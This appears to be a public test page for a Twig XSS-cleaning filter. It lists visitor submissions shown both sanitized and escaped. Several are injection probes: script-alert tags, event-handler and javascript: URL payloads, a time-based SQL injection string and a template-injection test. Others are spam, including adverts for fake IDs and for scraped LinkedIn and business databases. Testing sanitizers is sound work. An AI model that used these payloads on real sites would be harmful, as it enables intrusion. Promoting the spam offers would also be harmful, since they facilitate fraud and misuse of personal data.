Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

result with twig: {{ xss.xss | escape }}:

Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

keyword(s):

description: Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

by Dick Saucedo | at 2021-02-16 09:43:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

result with twig: {{ xss.xss | escape }}:

Hello If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

keyword(s):

description: Greetings If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

by Marylyn Preiss | at 2021-02-15 18:16:00


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

testins pace

result with twig: {{ xss.xss | escape }}:

<script>alert('testing')</script> testins pace

keyword(s):

description:

by je | at 2021-02-15 15:09:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('testing')</script>

keyword(s):

description: testing

by tes | at 2021-02-15 15:08:59


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

drop table xx;//

result with twig: {{ xss.xss | escape }}:

drop table xx;//

keyword(s): <html></html>

description:

by Ahmed's | at 2021-02-14 14:25:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Test contentu '"> XSS

result with twig: {{ xss.xss | escape }}:

Test contentu '"><script>alert(1);</script> XSS

keyword(s):

description:

by ja | at 2021-02-12 11:15:35


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hello hi {{ 4*4 }} bye

result with twig: {{ xss.xss | escape }}:

hello hi {{ 4*4 }} bye

keyword(s):

description: testing doublecurly for vue template injection

by dtk | at 2021-02-12 08:38:54


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

result with twig: {{ xss.xss | escape }}:

The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

keyword(s):

description: The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

by Ted Ochs | at 2021-02-12 08:14:42


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

result with twig: {{ xss.xss | escape }}:

It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

keyword(s):

description: It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

by Arnulfo Mawby | at 2021-02-11 07:58:17


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

DIV

result with twig: {{ xss.xss | escape }}:

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

keyword(s): asdf

description: asdf

by asdf | at 2021-02-09 19:02:46


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<body>foo bar</body>

result with twig: {{ xss.xss | escape }}:

<body>foo bar</body>

keyword(s): asd

description: asdf

by asdf | at 2021-02-09 19:00:12


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): adsf

description: script source

by asd | at 2021-02-09 18:59:14


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//-->">'>=

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--></S » CRIPT>">'><SCRIPT>alert(Stri » ng.fromCharCode(88,83,83))</ » SCRIPT>=&{}

keyword(s): sampe 1

description: Sampe from htmlpurifier.org

by Joe Palladino | at 2021-02-09 18:56:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John

result with twig: {{ xss.xss | escape }}:

John

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:51:37


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0') Mall&ey

result with twig: {{ xss.xss | escape }}:

John 0') Mall&ey

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:50:11


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0') Malley

result with twig: {{ xss.xss | escape }}:

John 0') Malley

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:49:23


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0'Malley

result with twig: {{ xss.xss | escape }}:

John 0'Malley

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:48:35


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

www'.mymonkey.com.uk

result with twig: {{ xss.xss | escape }}:

www'.mymonkey.com.uk

keyword(s): asfd

description: asdf

by Joe Palladino | at 2021-02-09 18:45:16


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

www.google.com

result with twig: {{ xss.xss | escape }}:

www.google.com

keyword(s): Simple test

description: whatever you want this to be

by www.google.com | at 2021-02-09 18:43:42


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

/bbs/list.php?keyfield=contents&tn=notice&word=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

result with twig: {{ xss.xss | escape }}:

/bbs/list.php?keyfield=contents&tn=notice&word=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

keyword(s): sdf

description:

by ssdf | at 2021-02-06 17:54:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE>

keyword(s): sdg

description: lk

by sd | at 2021-02-04 17:47:44